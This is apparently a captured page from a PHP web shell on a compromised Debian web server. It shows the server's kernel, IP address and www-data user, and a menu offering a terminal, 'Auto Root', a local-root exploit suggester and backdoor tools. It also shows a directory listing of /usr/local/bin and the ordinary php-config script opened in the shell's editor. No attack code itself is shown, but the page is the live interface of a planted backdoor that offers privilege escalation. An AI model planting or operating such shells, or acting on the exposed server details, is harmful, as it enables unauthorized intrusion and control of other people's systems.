Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-sr-x
2025-04-10 17:08
2to3-3.10
102
B
-rwxr-xr-x
2025-06-04 09:23
dumppdf.py
11.36
KB
-rwxr-xr-x
2025-04-10 17:08
idle3.10
100
B
-rwxr-xr-x
2025-06-04 09:23
pdf2txt.py
7.92
KB
-rwxr-xr-x
2025-04-10 17:08
pdfplumber
217
B
-rwxr-xr-x
2025-04-10 17:08
phar
14.54
KB
-rwxr-xr-x
2024-03-12 15:33
phar.phar
14.54
KB
-rwxr-xr-x
2024-03-12 15:33
php
43.15
MB
-rwxr-xr-x
2024-03-12 15:33
php-cgi
43.03
MB
-rwxr-xr-x
2024-03-12 15:33
php-config
2.7
KB
-rwxr-xr-x
2024-03-12 15:33
phpdbg
44.03
MB
-rwxr-xr-x
2024-03-12 15:33
phpize
4.41
KB
-rwxr-xr-x
2024-03-12 15:33
pip3.10
230
B
-rwxr-xr-x
2025-06-04 09:23
pydoc3.10
85
B
-rwxr-xr-x
2025-06-04 09:23
python3.10
18.28
MB
-rwxr-xr-x
2025-06-04 09:23
python3.10-config
3.02
KB
-rwxr-xr-x
2025-06-04 09:23
wp
6.72
MB
-rwxr-xr-x
2024-11-28 20:14
Save
Rename
#! /bin/sh SED="/bin/sed" prefix="/usr/local" datarootdir="/usr/local/php" exec_prefix="${prefix}" version="7.4.33" vernum="70433" include_dir="${prefix}/include/php" includes="-I$include_dir -I$include_dir/main -I$include_dir/TSRM -I$include_dir/Zend -I$include_dir/ext -I$include_dir/ext/date/lib" ldflags="" libs="-lcrypt -lresolv -lcrypt -lrt -lstdc++ -lrt -lm -ldl -lxml2 -lssl -lcrypto -lsqlite3 -lz -lcurl -lssl -lcrypto -lxml2 -lenchant -licuio -licui18n -licuuc -licudata -lonig -lsqlite3 -lxml2 -lcrypt -lxml2 -lxml2 -lxml2 -lz -lssl -lcrypto -lcrypt " extension_dir='/usr/local/lib/php/extensions/no-debug-non-zts-20190902' man_dir=`eval echo ${datarootdir}/man` program_prefix="" program_suffix="" exe_extension="" php_cli_binary=NONE php_cgi_binary=NONE configure_options=" '--with-config-file-path=/etc' '--enable-mbstring' '--with-curl' '--with-libdir=/lib/x86_64-linux-gnu' '--enable-bcmath' '--enable-ctype' '--enable-dom' '--with-enchant' '--enable-fileinfo' '--enable-filter' '--with-pdo-mysql' '--with-mysqli' '--with-openssl' '--enable-simplexml' '--enable-xml' '--with-zlib' '--enable-intl'" php_sapis=" cli phpdbg cgi" ini_dir="" ini_path="/etc" # Set php_cli_binary and php_cgi_binary if available for sapi in $php_sapis; do case $sapi in cli) php_cli_binary="${exec_prefix}/bin/${program_prefix}php${program_suffix}${exe_extension}" ;; cgi) php_cgi_binary="${exec_prefix}/bin/${program_prefix}php-cgi${program_suffix}${exe_extension}" ;; esac done # Determine which (if any) php binary is available if test "$php_cli_binary" != "NONE"; then php_binary="$php_cli_binary" else php_binary="$php_cgi_binary" fi # Remove quotes configure_options=`echo $configure_options | $SED -e "s#'##g"` case "$1" in --prefix) echo $prefix;; --includes) echo $includes;; --ldflags) echo $ldflags;; --libs) echo $libs;; --extension-dir) echo $extension_dir;; --include-dir) echo $include_dir;; --php-binary) echo $php_binary;; --php-sapis) echo $php_sapis;; --configure-options) echo $configure_options;; --man-dir) echo $man_dir;; --ini-path) echo $ini_path;; --ini-dir) echo $ini_dir;; --version) echo $version;; --vernum) echo $vernum;; *) cat << EOF Usage: $0 [OPTION] Options: --prefix [$prefix] --includes [$includes] --ldflags [$ldflags] --libs [$libs] --extension-dir [$extension_dir] --include-dir [$include_dir] --man-dir [$man_dir] --php-binary [$php_binary] --php-sapis [$php_sapis] --ini-path [$ini_path] --ini-dir [$ini_dir] --configure-options [$configure_options] --version [$version] --vernum [$vernum] EOF exit 1;; esac exit 0